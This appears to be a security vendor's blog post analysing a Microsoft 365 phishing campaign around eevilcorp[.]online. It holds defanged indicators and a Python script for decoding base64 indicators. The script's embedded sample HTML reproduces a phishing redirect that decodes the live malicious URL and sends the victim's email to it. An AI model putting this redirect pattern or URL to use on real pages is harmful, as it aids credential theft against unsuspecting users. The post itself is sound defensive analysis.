M365 Phishing Email Analysis – eevilcorp
July 06, 2023
Vade’s Threat Intelligence and Response Center (TIRC) has detected a new Microsoft 365 phishing attack. The TIRC analyzed an email containing a malicious HTML attachment.
In this post, we examine the TIRC’s phishing email analysis and review measures to stay protected.
Phishing email analysis: eevilcorp[.]online
We decoded the base64 encoded string:
Input: aHR0cHM6Ly9lZXZpbGNvcnAub25saW5lL2dlbmVyYXRvcj90YWJsZT0xMCZtZW1lPUYtMDAwNjAmcGVlcj15b3VuZ19tdWx0aXBsZQ==
Output (defanged): hxxps[://]eevilcorp[.]online/generator?table=10&meme=F-00060&peer=young_multiple
Once decoded, we discovered a malicious domain, eevilcorp[.]online.
Searching online, we found related Microsoft 365 phishing attacks whose phishing pages also made requests to eevilcorp[.]online.
Unknown phishers have leveraged the platform glitch.me to host malicious HTML pages.
Microsoft 365 phishing page - hxxps[://]periodic-checker[.]glitch[.]me
The source code of the page hosted at periodic-checker[.]glitch[.]me is similar to that of the HTML file attached to the email.
From this source code, we decoded the base64-encoded string:
Output (defanged): hxxps[://]eevilcorp[.]online/generator?table=4&meme=L-00057&peer=gbm_office
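The two decoding steps above (the attachment's string and the glitch.me page's string) are the same manual procedure: find the base64 literal the HTML hands to atob(), decode it, and defang whatever URL comes out. The script below automates that procedure. It is an added example written for this article, not Vade's or the TIRC's tooling; the base64 input is the one printed above, while the surrounding HTML is a constructed stand-in for the attachment, not the real file. It also tolerates the two things that usually break a naive decode of a pasted string: stray whitespace inside the literal and missing `=` padding.

```python
import base64
import re
from urllib.parse import urlparse

# The base64 string decoded in the post above (the attachment's encoded URL).
ATTACHMENT_B64 = (
    "aHR0cHM6Ly9lZXZpbGNvcnAub25saW5lL2dlbmVyYXRvcj90YWJsZT0xMCZtZW1l"
    "PUYtMDAwNjAmcGVlcj15b3VuZ19tdWx0aXBsZQ=="
)

# Constructed stand-in for the malicious HTML attachment: a page that hides the
# phishing-kit URL in a base64 literal and decodes it with atob() at load time.
# This is NOT the attachment analyzed by the TIRC, only a plausible shape for it.
SAMPLE_HTML = f"""<html><body>
<script>
var target = atob("{ATTACHMENT_B64}");
window.location = target + "&u=" + encodeURIComponent("user@example.com");
</script>
</body></html>"""

# Quoted literals of at least 24 base64-alphabet characters. Whitespace is
# allowed inside because wrapped or copy-pasted strings often contain it.
STRING_LITERAL_RE = re.compile(r'''["']([A-Za-z0-9+/=\s]{24,})["']''')
URL_RE = re.compile(r'''https?://[^\s"'<>]+''')


def normalize_b64(s):
    """Strip whitespace, reject non-base64 input, and restore missing '='
    padding (kits often drop it because the browser's atob() tolerates that)."""
    s = re.sub(r"\s+", "", s)
    if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        return None
    return s + "=" * (-len(s) % 4)


def decode_b64(s):
    """Decode a base64 literal to text; return None if it is not valid base64
    or does not decode to UTF-8 (in which case it is probably binary data)."""
    normalized = normalize_b64(s)
    if normalized is None:
        return None
    try:
        return base64.b64decode(normalized, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def defang(url):
    """Defang a URL the way this post does: hxxps[://]host[.]tld/path[.]ext.
    Every dot after the scheme is bracketed, so a file extension in the path
    is neutralized too (as in the post's petayor[.]php output)."""
    scheme, _, rest = url.partition("://")
    return f"{scheme.replace('http', 'hxxp')}[://]{rest.replace('.', '[.]')}"


def extract_iocs(html):
    """Decode every base64 literal in an HTML attachment and return, for each,
    the decoded text, its defanged URLs, and the bare hostnames (the hostnames
    are what go into blocklists and threat-intel lookups)."""
    findings = []
    for match in STRING_LITERAL_RE.finditer(html):
        decoded = decode_b64(match.group(1))
        if decoded is None:
            continue
        urls = URL_RE.findall(decoded)
        findings.append({
            "decoded": decoded,
            "defanged_urls": [defang(u) for u in urls],
            "domains": sorted({urlparse(u).hostname for u in urls}),
        })
    return findings


if __name__ == "__main__":
    for finding in extract_iocs(SAMPLE_HTML):
        print("decoded :", finding["decoded"])
        print("defanged:", finding["defanged_urls"])
        print("domains :", finding["domains"])
```

Run it against a real attachment by reading the file into `extract_iocs()` instead of `SAMPLE_HTML`. Because it decodes every long quoted literal rather than only the argument of `atob()`, it also catches kits that split the string across several variables or hide the URL in a `data:` attribute, at the cost of a few false hits on long non-URL literals (those simply come back with an empty `defanged_urls` list).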
We found another phishing attack spoofing Adobe:
Adobe phishing page
We decoded the base64 encoded strings:
Output (defanged): hxxps[://]ultimotempore[.]online/services/petayor[.]php
The second base64 string is longer; from it we again retrieved the domain eevilcorp[.]online, which is used to collect the victim's IP address when the trapped page is opened.
The output returned by eevilcorp[.]online/activity/open was a JSON object.
On Joe Sandbox, we found a scan report for Paystub-382023.html, another phishing attack associated with eevilcorp[.]online.
Phishing page spoofing Microsoft - Paystub-382023.html
Analysis overview - edge_driver.js
VirusTotal - edge_driver.js details
According to several online reports, the file edge_driver.js is related to a browser adware/hijacker known as Edge Shopping. Below is a list of related files:
We suspect that various malware could be distributed or dropped by an HTML page like Paystub-382023.html.
What is the Hawkeye authentication form?
The page returned by the malicious domain eevilcorp[.]online is an authentication page related to an application named Hawkeye.
Authentication form – Hawkeye
As reported by several cybersecurity actors such as Talos, the original HawkEye Keylogger is a malware kit whose history dates back to 2013. Because several versions have been released since, we cannot tell whether the authentication page above is related to HawkEye Keylogger.
HawkEye Keylogger logos
HawkEye PHP Logger (2014)
Phishing email analysis - indicators of compromise (IoCs)
Below are important indicators of compromise (IoCs) related to the phishing email analysis.
Takeaways from M365 phishing email analysis
Phishing remains a top threat and the #1 method of distributing malware, including ransomware. Protecting your organization from compromise calls for adopting user awareness training that teaches employees how to spot and handle phishing threats. It also requires reinforcing your Microsoft 365 email security with integrated protection from a third-party solution.
Vade for M365 is a collaborative email security solution for Microsoft 365 powered by AI and enhanced by people. In addition to robust incident response and advanced threat detection capabilities, it offers automated phishing awareness training that is personalized and administered whenever users encounter a phishing threat.